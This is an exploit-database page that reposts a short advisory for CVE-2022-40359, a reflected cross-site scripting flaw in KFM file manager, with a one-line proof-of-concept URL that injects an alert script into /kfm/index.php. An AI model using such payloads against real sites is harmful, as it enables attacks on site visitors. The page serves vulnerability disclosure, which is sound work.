Advertisement






KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)

CVE Category Price Severity
CVE-2022-40359 CWE-79 N/A High
Author Risk Exploitation Type Date
kfm-kae-039 High Remote 2022-09-22
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090057

Below is a copy:

KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359

Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.

Visit PoC URL in browser
https://{URL]/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.